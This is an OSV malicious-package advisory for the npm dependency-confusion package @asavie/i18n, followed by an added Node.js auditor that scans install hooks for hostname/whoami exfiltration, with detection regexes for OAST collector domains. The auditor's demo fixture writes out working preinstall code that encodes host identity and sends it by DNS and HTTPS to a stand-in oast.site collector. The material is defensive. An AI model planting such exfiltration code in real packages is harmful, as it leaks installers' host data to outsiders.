{"id":"MAL-2026-4265","summary":"Malicious code in @asavie/i18n (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d803002ee95ea92bdcb3a918e1be10930816db383ce2a58a6947afea84e04040)\n@asavie/i18n@99.0.0 is a dependency-confusion package targeting an unclaimed npm scope. Its package.json declares a `preinstall` hook that runs `node callback.js`, which on `npm install` reads `os.hostname()` and the output of `whoami` (callback.js L23, L28) and transmits them to the attacker-controlled out-of-band collector `d88r3mao12pqka8tg04gn4ychek66c3wj.oast.site` (an Interactsh subdomain) via both a DNS A-record lookup and an `https.get()` request with the data base64url-encoded into the subdomain (callback.js L21, L37, L46). Version `99.0.0` and the squat on the `@asavie` scope are the canonical dependency-confusion shape — any build that mistakenly resolves this scope from public npm leaks identifying host data to the publisher. The tarball additionally ships an unrelated ~123 MB `google-chrome-stable_current_amd64.deb` that is not referenced by any code path; it is not executed but represents either staging or registry abuse. Author claims of 'authorized research' are unverifiable by installers and do not change the installer-side outcome: unsolicited exfiltration of host identifiers on `npm install`.\n\n## Source: ossf-package-analysis (c72462533b89e20b39c2336d38a51d34b95330c056845b95a3b390740cadc803)\nThe OpenSSF Package Analysis project identified '@asavie/i18n' @ 99.0.1 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-26T06:01:51.669276117Z","published":"2026-05-23T14:52:50Z","database_specific":{"malicious-packages-origins":[{"versions":["99.0.1"],"import_time":"2026-05-23T15:28:34.273184353Z","source":"ossf-package-analysis","sha256":"c72462533b89e20b39c2336d38a51d34b95330c056845b95a3b390740cadc803","modified_time":"2026-05-23T15:10:47Z"},{"versions":["99.0.3"],"import_time":"2026-05-23T16:50:06.156630627Z","sha256":"c90149499c9faecb4948903496d7a99bd57f787ed20b7e4e0328d932cd89d96a","source":"ossf-package-analysis","modified_time":"2026-05-23T16:35:32Z"},{"versions":["99.0.0"],"id":"IN-MAL-2026-004342","import_time":"2026-05-26T05:52:24.76185584Z","sha256":"e4fec4f800c855729363575ea3ab7f2b6defc5aa0de71d2f1a5895a3db69bb27","source":"amazon-inspector","modified_time":"2026-05-23T14:52:50Z"},{"versions":["99.0.1"],"id":"IN-MAL-2026-004343","import_time":"2026-05-26T05:52:24.857316692Z","sha256":"3564af29bcc73620093aecb81252259e227011d411a609130c82c9004fb02586","source":"amazon-inspector","modified_time":"2026-05-23T15:00:31Z"},{"versions":["99.0.1"],"id":"IN-MAL-2026-004344","import_time":"2026-05-26T05:52:24.958276192Z","sha256":"7e403fc0ec28bb05f955dad212fb2b83e7f2143dddd57385b0beac5626fbd99d","source":"amazon-inspector","modified_time":"2026-05-23T15:00:32Z"},{"versions":["99.0.3"],"id":"IN-MAL-2026-004354","import_time":"2026-05-26T05:52:26.253325979Z","sha256":"96b50c34d5d5e18e0c6abe89f65dca503cbc25b831d29cf0862df0d3c6b464b1","source":"amazon-inspector","modified_time":"2026-05-23T15:59:33Z"},{"versions":["99.0.3"],"id":"IN-MAL-2026-004355","import_time":"2026-05-26T05:52:26.350803682Z","sha256":"a73d77d4aaaafa5e736bc16da0eedee95e34c5ad31edd3abee306c8c8015158b","source":"amazon-inspector","modified_time":"2026-05-23T15:59:33Z"},{"versions":["99.0.0"],"id":"IN-MAL-2026-004341","import_time":"2026-05-26T05:52:24.648092427Z","sha256":"d803002ee95ea92bdcb3a918e1be10930816db383ce2a58a6947afea84e04040","source":"amazon-inspector","modified_time":"2026-05-23T14:52:50Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@asavie/i18n/v/99.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@asavie/i18n/v/99.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@asavie/i18n/v/99.0.0"}],"affected":[{"package":{"name":"@asavie/i18n","ecosystem":"npm","purl":"pkg:npm/%40asavie%2Fi18n"},"versions":["99.0.1","99.0.3","99.0.0"],"database_specific":{"indicators":{"domains":["asavie-i18n.scan-9bd78a93bd58.scan.tfhvz0.d88r3mao12pqka8tg04gn4ychek66c3wj.oast.site"],"package_integrity":[{"filename":"i18n-99.0.1.tgz","hashes":{"sha512_sri":"sha512-dYrlHHgkJyc37sqj6jXlDc5sg91nYT0+Ax01Mf2jSDsxILyHf3VW4C5GOLZJk9NF3lzzJb6/U7yQLFd8WYhhXg==","sha1":"7986d67e9b1ca8c93b796d51b5d0f9d8de488dc2"}}],"evidence_files":[{"path":"callback.js","tlsh":"f74186b923f1433015a319d1075f6364026be297b921e9e074fd03484f476aed323ee9","sha256":"9ca346964801019aa05f2563d830f13878d5692cca17d896e9a23add9b4ae582"},{"path":"package.json","tlsh":"5ef0d4b49434993319f843d61678d14db029ed4fdc449d1f56c3058c936e5f3067d28d","sha256":"9d3252c9f72c9812b7ae69177001b915400849291d60663d63f8074128bbfe15"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@asavie/i18n/MAL-2026-4265.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}
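The collection-and-exfiltration shape this record describes (an install lifecycle hook, host identity from `os.hostname()` and `whoami`, a DNS lookup plus an `https.get()` to an Interactsh collector with the data encoded into the hostname, all riding on a 99.x version squat of an unclaimed scope) is exactly what a registry gate or pre-install audit should catch. The Node.js script below is an added example, not code from this advisory, from Amazon Inspector, from OpenSSF or from the package itself: it statically audits a package's install hooks for that shape and flags the implausible major version. The sample package contents are constructed for the demo; the scope `@example-scope`, the collector label, the version threshold of 50 and the short OAST domain list are assumptions rather than anything taken from the real tarball.

```javascript
// Added example (not the advisory's or the package's code): static audit of an npm
// package's install hooks for the hostname/whoami exfiltration shape described above.

// Lifecycle scripts npm runs during `npm install` unless `ignore-scripts=true` is set.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator families matched against an install script's source. The OAST domain list
// (Interactsh, Burp Collaborator) is a short starting point and an assumption.
const INDICATORS = [
  { label: 'reads host identity', re: /\bos\.(hostname|userInfo)\s*\(|\bwhoami\b/ },
  { label: 'spawns shell commands', re: /\bchild_process\b|\bexec(Sync)?\s*\(|\bspawn(Sync)?\s*\(/ },
  { label: 'outbound DNS lookup', re: /\bdns\.(lookup|resolve\w*|promises)\b/ },
  { label: 'outbound HTTP(S) request', re: /\bhttps?\.(get|request)\s*\(|\bfetch\s*\(/ },
  { label: 'known OAST collector domain', re: /\.(oast\.(site|pro|live|online|fun|me)|interact\.sh|oastify\.com|burpcollaborator\.net)\b/i },
  { label: 'encodes data for a hostname label', re: /base64url|toString\(\s*['"](base64|hex)['"]\s*\)/ },
];

// Install-time hooks declared in a parsed package.json, with their commands.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Local script files a hook command hands to `node` (e.g. `node callback.js`).
function scriptTargets(command) {
  const targets = [];
  const re = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/g;
  let m;
  while ((m = re.exec(command)) !== null) targets.push(m[1]);
  return targets;
}

// Labels of every indicator family present in a script's source.
function scanSource(src) {
  return INDICATORS.filter(({ re }) => re.test(src)).map(({ label }) => label);
}

// Dependency-confusion heuristic: an implausibly high major version (99.x here) exists
// to win npm's highest-version resolution against an internal package of the same name.
// The threshold of 50 is an assumption; tune it to what your own registry carries.
function looksLikeVersionSquat(version, threshold = 50) {
  const major = parseInt(String(version).split('.')[0], 10);
  return Number.isInteger(major) && major >= threshold;
}

// Assess an in-memory tarball ({ path: contents }). `malicious` is true when an install
// hook runs a script that both reads host identity and opens an outbound channel;
// `findings` records every signal so a reviewer can see why.
function assessPackage(files) {
  const pkg = JSON.parse(files['package.json']);
  const findings = [];
  let exfil = false;
  if (looksLikeVersionSquat(pkg.version)) {
    findings.push(`version ${pkg.version}: implausibly high major, dependency-confusion shape`);
  }
  for (const { hook, command } of findInstallHooks(pkg)) {
    findings.push(`${hook} hook runs: ${command}`);
    for (const target of scriptTargets(command)) {
      if (files[target] === undefined) {
        findings.push(`${target}: referenced by ${hook} but missing from the tarball`);
        continue;
      }
      const hits = scanSource(files[target]);
      for (const h of hits) findings.push(`${target}: ${h}`);
      if (hits.includes('reads host identity') && hits.some((h) => h.startsWith('outbound'))) exfil = true;
    }
  }
  return { name: pkg.name, version: pkg.version, malicious: exfil, findings };
}

// Constructed sample modelled on the record's description, not the real tarball:
// preinstall -> node callback.js -> hostname + whoami -> DNS and HTTPS to a collector,
// data base64url-encoded into the hostname. Scope and collector name are made up.
const SAMPLE_MALICIOUS = {
  'package.json': JSON.stringify({ name: '@example-scope/i18n', version: '99.0.0', scripts: { preinstall: 'node callback.js' } }),
  'callback.js': [
    "const os = require('os'), dns = require('dns'), https = require('https');",
    "const { execSync } = require('child_process');",
    "const label = Buffer.from(os.hostname() + '|' + execSync('whoami').toString().trim()).toString('base64url');",
    "const host = label + '.collector-id.oast.site';",
    "dns.lookup(host, () => {});",
    "https.get('https://' + host + '/', () => {}).on('error', () => {});",
  ].join('\n'),
};

// Constructed benign control: a postinstall step that only touches the local tree.
const SAMPLE_BENIGN = {
  'package.json': JSON.stringify({ name: '@example-scope/i18n', version: '1.4.2', scripts: { postinstall: 'node postinstall.js' } }),
  'postinstall.js': "const fs = require('fs'); fs.mkdirSync('.cache', { recursive: true });",
};

console.log(JSON.stringify(assessPackage(SAMPLE_MALICIOUS), null, 2));
console.log(JSON.stringify(assessPackage(SAMPLE_BENIGN), null, 2));
```

Run it with `node audit.js` (file name assumed). The script is static, so an obfuscated install hook can dodge the regexes; treat a clean result as absence of this specific pattern, not as a clean bill of health. The two npm-side controls that stop this class outright are `ignore-scripts=true` in `.npmrc`, so lifecycle hooks never execute on install, and a scoped registry entry of the form `@asavie:registry=<your internal registry URL>`, so the scope is never resolved from public npm in the first place.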